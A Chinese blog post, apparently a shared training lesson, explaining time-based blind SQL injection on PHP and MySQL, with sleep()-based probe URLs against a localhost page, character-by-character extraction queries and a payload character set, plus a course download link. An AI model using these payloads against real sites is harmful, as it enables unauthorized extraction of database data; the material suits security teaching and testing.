【原创】（PHP+MYSQL（延时注入和注入工具编写）

摘要

【原创】（PHP+MYSQL （延时注入和注入工具编写） 【原创】（PHP+MYSQL（延时注入和注入工具编写）

【原创】（PHP+MYSQL（延时注入和注入工具编写）

【原创】（PHP+MYSQL（延时注入和注入工具编写）

这是以前培训录制的一个课程 现在分享出来给大家学习吧。

延时注入 等于时间差注入

 

延时注入往往用于难于判断页面 是否存在注入漏洞的检测方法。

 

延时注入的原理：在mysql中存在sleep函数，这个函数是主要让数据库查询的结果，等待多少秒返回给客户端，可以使用这个函数构造注入语句加以判断即可。

 

Sleep

select sleep(10)

 

if

select if('x'='y',1,0)

 

select if('x'='x',sleep(5),0)

 

判断是否存在注入

http://localhost/sql/sleep.php?id=1%20and%20sleep(10)

 

出数据

selectif(ascii(substring(user(),1,1))=114,sleep(5),0)

 

首先要判断这个字符串的长度select LENGTH(user()) 14

 

selectif(ascii(substring(user(),1,1))=114,sleep(5),0)

 

select if(ascii(substring(user(),2,1))=114,sleep(5),0)

 

payloads='abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'

 

判断第一个

 

root@localhost

 

就是延时注入得到数据的原理

教程下载

链接：https://pan.baidu.com/s/1smCSyXv 密码：h0fw

我的微信公众号 不定期更新一些渗透技巧和教程